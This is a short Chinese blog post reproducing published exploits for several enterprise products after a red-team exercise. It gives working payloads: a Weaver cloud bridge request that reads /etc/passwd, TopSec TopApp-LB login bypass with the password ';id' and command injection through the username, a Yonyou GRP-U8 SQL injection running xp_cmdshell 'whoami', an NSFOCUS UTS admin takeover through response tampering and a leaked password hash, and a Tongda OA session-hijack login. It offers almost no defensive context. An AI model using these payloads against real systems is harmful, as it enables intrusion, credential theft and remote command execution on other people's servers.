护网几个漏洞的简单复现

护网过去了两天,爆出了几个漏洞。既然poc已经出了就简单复现一下。

泛微云桥文件读取

访问/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt,会得到一个ID值

将得到的id值代入访问:/file/fileNoLogin/a2bc1953afc94346a729d7b0ff7f8c5d

天融信TopApp-LB

任意登录
用户名随便填写,密码为;id,成功登录某系统

命令执行漏洞
登录处用户名输入执行命令的语句,密码随便填写

成功执行了命令

用友GRP-u8 注入

路径:/Proxy
POST数据:cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexec xp_cmdshell ‘whoami’

绿盟UTS综合威胁探针管理员任意登录

1、修改登录数据包 {“status”:false,”mag”:””} -> {“status”:true,”mag”:””}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码(md5)

再次登录,将得到的md5替换admin的密码,即可成功登录

通达OA前台任意用户登录

1.首先访问 /ispirit/login_code.php 获取 codeuid。

2.然后访问 /general/login_code_scan.php 提交 post 参数:

3.最后访问/ispirit/login_code_check.php?codeuid=xxx,就可以得到session
将得到的session替换

即可登录OA

发表评论

电子邮件地址不会被公开。 必填项已用*标注